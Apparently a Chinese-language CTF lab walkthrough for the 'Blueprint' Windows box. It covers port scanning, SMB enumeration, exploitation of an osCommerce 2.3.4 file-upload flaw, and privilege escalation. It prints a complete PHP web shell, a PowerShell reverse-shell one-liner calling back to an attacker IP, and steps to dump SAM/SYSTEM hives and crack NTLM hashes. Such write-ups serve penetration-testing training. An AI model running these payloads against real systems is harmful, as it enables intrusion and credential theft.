Blueprint Walkthrough

Box Info

官网在这里:blueprint

Hack into this Windows machine and escalate your privileges to Administrator.

image-20250419200643931

The Hack

对目标主机做全端口扫描

nmap -p- 10.10.253.208 --min-rate 500 

发现开放 80 、135、139、443、445、3306、8080 端口

image-20250419191935702

对开放的端口进行应用版本发现

nmap -p 80,135,139,443,445,3306,8080 -sC -sV 10.10.253.208

80、8080 开放 HTTP 服务,443 端口开放 SSL/HTTP 服务,139/445 端口开放 SMB 服务,135 端口开放 RPC 服务

image-20250419192043241

先来看 SMB 服务,使用 smbclient 枚举共享目录

smbclient -N -L //10.10.253.208

发现共享目录 Users 和 Windows

image-20250419192254263

远程登陆 Users 共享目录,枚举文件

smbclient -N //10.10.253.208/Users

找了一圈并没有泄露机密信息

image-20250419192503970

再来看 Windows 共享目录,之前权限不够,不能进行枚举

image-20250419192610376

来看 135 端口,rpcclient 能连接但是是权限不够,不能进行枚举

image-20250419192726207

enum4linux 也什么都跑不出来,最后只剩 HTTP 和 SSL/HTTP 服务了,依次访问主页面,发现仅 8080 端口正常响应

/docs 似乎是一些文件

image-20250419193435437

/catalog 响应页面但是排版错乱,网页内链接指向 localhost,需要进行 SSH 端口转发

systemctl start ssh
ssh -CNfg -L 8080:10.10.253.208:8080 kali@127.0.0.1

image-20250419192932929

再次访问即可响应正常页面

image-20250419193051077

依据 URL 中泄露的版本搜索 EXP ,https://www.exploit-db.com/exploits/43191 指名存在文件上传漏洞,需要登录才能利用

该网站似乎并没有配置完全,需要 New Installation 才行

image-20250419193725210

第一步存在弱口令,账号为 root 密码为空

image-20250419193852985

这里泄露了网站根目录 C:/xampp/htdocs/oscommerce-2.3.4/catalog/

image-20250419174200720

设置账号密码为 admin/admin

image-20250419174259691

编辑上传的 PHP 木马文件 shell.php

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
exec($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

使用 python2 执行该漏洞利用代码

python2 43191.py -u http://10.10.253.208:8080/oscommerce-2.3.4 --auth=admin:admin -f shell.php

成功上传木马文件

image-20250419174352072

由于目标主机系统为 Windows 使用 powershell 反弹 shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.8.99.84',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

成功接收回弹的 shell

image-20250419175536025

进入 Administrator 的桌面即可获得 root.txt

image-20250419175503612

由于笔者 mimitaskz 上传后并不能成功执行,故尝试通过注册表导出 SAM 和 SYSTEM 文件,保存在 C:/xampp/htdocs/oscommerce-2.3.4/docs/ 目录中,这样就可以直接访问 web 站点进行下载

image-20250419194629218

访问 /oscommerce-2.3.4/docs/ 目录,点击直接下载 SAM 和 SYSTEM 文件

image-20250419194831069

使用 samdump2 提取 NTLM 哈希

samdump2 system.save sam.save 

获得 Lab NTLM 哈希

image-20250419195535055

https://crackstation.net/ 破解出 Lab 的明文密码

image-20250419200306130

Final

image-20250419200342460